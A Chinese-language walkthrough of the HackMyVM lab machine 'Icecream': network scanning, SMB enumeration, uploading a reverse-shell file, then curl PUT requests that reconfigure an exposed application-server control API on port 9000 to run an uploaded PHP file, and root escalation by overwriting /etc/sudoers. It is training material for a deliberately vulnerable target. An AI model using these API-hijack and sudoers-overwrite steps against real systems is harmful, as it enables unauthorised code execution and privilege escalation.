hackmyvm靶机：Icecream

Vulnhub

简介

Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://hackmyvm.eu

下载下来解压。这里我用的是Oracle VirtualBox。

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth1 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.31.204后使用namp扫描靶机。

nmap 192.168.31.204 -A -O -p-

• -A 进行全面扫描，包括服务版本探测、操作系统检测等。
• -O 进行操作系统检测，尝试识别远程主机的操作系统类型。
• -p 指定要扫描的端口范围或特定端口，如1-65535或80,443。

开放22，80，139，445，9000端口。扫了一下80端口没什么东西。445端口倒是给了个用户。

enum4linux 192.168.31.204

登录上去，传了个弹shell的文件。

服务80端口就弹回来了。安排老三套后没什么可以利用的。

做到这里已经没思路了。我是大傻子a，这个up讲的很好这次的渗透思路和过程都是看他的。

又传了个脚本上去。

突破口就在9000端口下面。

这里强烈推荐去看一下up的思路。这里我也讲不清楚。这里基本上是照抄up的过程，这个东西不太了解。

curl http://192.168.31.204:9000/config

curl http://192.168.31.204:9000/config/applications -X PUT -d '{"sb":{"type":"php","root":"/tmp","script":"a.php"}}'

curl http://192.168.31.204:9000/config/routes -X PUT -d '[{"action":{"share":"/tmp/a.php$uri","fallback":{"pass":"applications/sb"}}}]'

curl http://192.168.31.204:9000/config/listeners -X PUT -d '{"*:8400":{"pass":"routes"}}'

curl http://192.168.31.204:8400/a.php

确实牛。再一次推荐这个up。

有ice这个用户就可以提权了。先写一个公钥个它。

因为这个靶机的/usr/sbin/ums2net是提权点。所以我们要创建一个a.conf

写入3000 of=/etc/sudoers。

先开启它，在用echo传东西。

这样我们就在/etc/sudoers文件里面写入了。

sudoers的内容。

后续

从ice用户后完全是照抄up的。太难了这个靶机。